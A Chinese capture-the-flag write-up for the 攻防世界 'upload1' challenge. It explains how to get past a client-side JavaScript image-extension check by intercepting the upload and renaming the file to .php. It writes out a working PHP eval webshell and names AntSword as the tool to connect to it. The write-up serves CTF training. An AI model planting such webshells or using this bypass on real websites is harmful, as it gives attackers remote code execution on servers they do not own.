[CTF/网络安全] 攻防世界 upload1 解题详析

[CTF/网络安全] 攻防世界 upload1 解题详析

考察文件上传,具体原理及姿势不再赘述。

姿势

在txt中写入一句话木马<?php @eval($_POST[qiu]);?>

回显如下:

查看源代码:

复制代码
Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}
 }

这段代码的作用是检查上传文件的扩展名是否符合要求,如果是图片格式(jpg或png),则启用提交按钮,否则禁用提交按钮并弹出提示消息。

其中用到了 JavaScript 中的 Array 原型对象和条件判断语句。该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数,用于判断一个对象是否在数组中,主要应用于判断上传文件的扩展名是否属于指定的图片格式,这里是 ['jpg','png']

更改文件格式为jpg

文件上传成功:

进入所在路径:

上图说明jpg文件被拦截

抓包,修改filename文件后缀为.php,重发请求包


进入所在路径:

无Error回显,说明木马上传成功。
若不清楚木马是否上传成功,可修改内容如下:

复制代码
<?php 
@eval($_POST['qiu']);
echo('qiu');
?>

若文件上传成功,则在上传路径对应的页面会输出qiu

连接蚁剑:

相关推荐
桑晒.24 分钟前
CSRF漏洞原理及利用
前端·web安全·网络安全·csrf
qq_40999093?1 小时前
安全和AI方向的学习路线
人工智能·安全
q3181369062 小时前
打造高效、安全的期货资管交易平台:开发流程与关键要素解析
安全
FreeBuf_7 小时前
伪装成华硕游戏辅助软件的ArmouryLoader:突破系统安全防护的恶意代码注入器
安全·游戏·系统安全
Neolock7 小时前
从一开始的网络攻防(十四):WAF绕过
网络·安全·web安全·waf
不灭锦鲤7 小时前
网络安全学习第16集(cdn知识点)
学习·安全
上海云盾第一敬业销售11 小时前
为什么网站需要高防IP?高防IP的优势是什么?
网络·tcp/ip·安全
叙后尘11 小时前
2025年湖北中级注册安全工程师报考那些事
安全
前与端12 小时前
前端XSS常见特征与防范措施
安全
拉法豆粉14 小时前
渗透测试与漏洞扫描有什么区别?
网络·安全·web安全